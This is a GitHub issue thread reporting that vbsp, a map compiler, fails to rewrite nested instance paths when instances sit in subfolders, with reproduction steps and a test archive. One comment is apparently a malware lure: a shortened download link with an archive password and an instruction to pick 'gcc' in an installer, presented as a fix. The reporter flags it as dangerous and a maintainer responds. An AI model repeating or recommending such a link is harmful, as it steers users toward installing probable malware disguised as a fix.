### ISSUE TITLE
Vbsp does not process instances properly.

### ISSUE THREAD

**Issue by Unusuario2** [Facepunch/garrysmod-issues#5985]
### Details

Vbsp does not support instances inside instances because vbsp when collapsing the main instance does not rename the path of the instance inside. This only happend if the instances are inside a folder and the other instance is in a sub folder

Example: 
Path of the main instance: instances/instance_1.vmf
Path of the instance inside of main instance: sub/instance_1_sub.vmf

Vbsp when collapsing instances/instance_1.vmf does not rename the path of the instance inside (sub/instance_1_sub.vmf) to instance/sub/instance_1_sub.vmf.

See the video bellow:

https://github.com/user-attachments/assets/4698073f-921b-4878-b1a5-c8547b1779a1

[test_vbsp.zip](https://github.com/user-attachments/files/16766212/test_vbsp.zip)

### Steps to reproduce

1.Download the .zip 
2. Compile test_instance.vmf and see the error.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Unusuario2** [comment]
@robotboy655 Can you remove the link of @c0ffincolors ? This could be a dangereous link.

**Comment by robotboy655** [comment]
Will be fixed.
